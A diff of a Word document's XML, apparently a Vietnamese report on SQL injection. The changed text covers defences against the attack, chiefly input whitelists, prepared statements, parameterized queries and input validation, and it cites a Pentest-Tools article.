+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>đưa các ký tự được chấp nhận hoặc bị từ chối vào danh sách trắng và danh sách đen trong các trường nhập liệu của ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i dùng. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Việc tạo danh sách các ký tự được chấp thuận là một phương pháp hiệu quả để phòng thủ trước các cuộc tấn công SQL injection. Khi danh sách trắng đã sẵn sàng, ứng dụng sẽ không cho phép tất cả các yêu cầu chứa các ký tự nằm ngoài danh sách trắ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ng đó.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18635,70 +18841,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sau đó, ta nên </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ập nhật và vá lỗi máy chủ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>một cách t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>hường xuyên cập nhật các bản vá lỗi bảo mật cho máy chủ cơ sở dữ liệu và hệ điề</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>u hành.</w:t>
+        <w:t>Danh sách đen không phải là giải pháp được khuyến nghị để bảo vệ chống lại bất kỳ loại tấn công chèn mã độc nào vì nó dễ bị lỗi. Phương pháp này hiệu quả miễn là nhà phát triển có thể đảm bảo rằng các trường nhập liệu của người dùng không chấp nhận bất kỳ ký tự đặc biệt nào ngoài những ký tự bắt buộc. Kết quả là sẽ loại bỏ tất cả các ký tự có thể gây hạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>i.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18722,70 +18875,37 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Theo sau là việc </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ử dụng hệ thống tường lử</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a (Firewall) và IDS/IPS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ta có thể đ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ặt máy chủ cơ sở dữ liệu sau hệ thống tường lửa để tránh tương tác trực tiếp. Các hệ thống IDS (Intrusion Detection System) và IPS (Intrusion Prevention System) như SNORT có thể giúp phát hiện và ngăn chặn các truy vấn khả</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nghi.</w:t>
+        <w:t>Chúng ta hãy sử dụng ví dụ về một cửa hàng trang web cho phép người tiêu dùng tìm kiếm theo từ khóa để chứng minh tác động của việc tấ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n công SQL. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Kẻ tấn công có thể lợi dụng việc trang web không kiểm tra kỹ lưỡng thông tin người dùng bằng cách nhập mã SQL injection độc hại vào trường tìm kiếm. Sau đó, cơ sở dữ liệu của trang web có thể chạy mã này, cho phép kẻ tấn công truy cập vào dữ liệu nhạy cảm như tên người dùng, mật khẩ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>u và thông tin thanh toán.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18809,7 +18929,797 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cuối cùng ta nên </w:t>
+        <w:t>Các nhà phát triển có thể sử dụng các phương pháp như truy vấn tham số và khử trùng đầu vào để chủ động xác thực dữ liệu đầu vào của người dùng và ngăn chặn loại tấ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n công này. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Cả truy vấn có tham số và kỹ thuật khử trùng đều loại bỏ các ký tự có khả năng gây hại mà bạn có thể sử dụng để thực thi các lệnh độc hại từ dữ liệu đầu vào của người dùng trước khi gửi đến cơ sở dữ liệu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Bên cạnh đó ta có thể </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>p dụng Prepared Statements (Câu lệnh chuẩn bị</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>đây</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> là phương pháp hiệu quả nhất để ngăn chặn SQL Injection. Thay vì xây dựng câu lệnh SQL bằng cách ghép chuỗi, bạn sử dụng các tham số (placeholder). Điều này giúp tách biệt hoàn toàn mã SQL với dữ liệu đầu vào, ngăn chặn mã độc thự</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>c thi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Đây là các câu lệnh SQL được biên dịch sẵn, tách biệt logic SQL với dữ liệu đầu vào của người dùng. Với những câu lệnh này, doanh nghiệp có thể tự bảo vệ mình khỏi các cuộc tấn công SQL injection bằng cách bảo vệ các trường dữ liệu đầu vào của người dùng khỏi mã độ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>c.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Thuật ngữ "xác thực đầu vào" đề cập đến quá trình so sánh dữ liệu người dùng nhập vào với một bộ tiêu chuẩn. Doanh nghiệp cần triển khai các biện pháp kiểm tra xác thực đầu vào chặt chẽ để đảm bảo dữ liệu người dùng nhập vào là hợp lệ và đáp ứng các tiêu chuẩn về giá trị kỳ vọng, kiểu dữ liệu và độ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dài. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Bằng cách này, tội phạm mạng sẽ không sử dụng các trường nhập liệu để lén đưa vào các câu lệnh SQL độc hại</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"lzg8Ndv4","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[14]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Thực </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>hiện</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> truy vấn có tham số</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cũng là một cách phòng chống an toàn.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Tương tự như các câu lệnh đã chuẩn bị, chúng làm giảm khả năng xảy ra lỗ hổng SQL injection bằng cách sử dụng trình giữ chỗ cho dữ liệu đầu vào của người dùng và tự động khử trùng dữ liệu đầu vào</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"F9PQfRnM","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[14]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ngoài ra ta cần </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>án quyền thích hợp cho ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i </w:t>
+      </w:r>
+      <w:r>
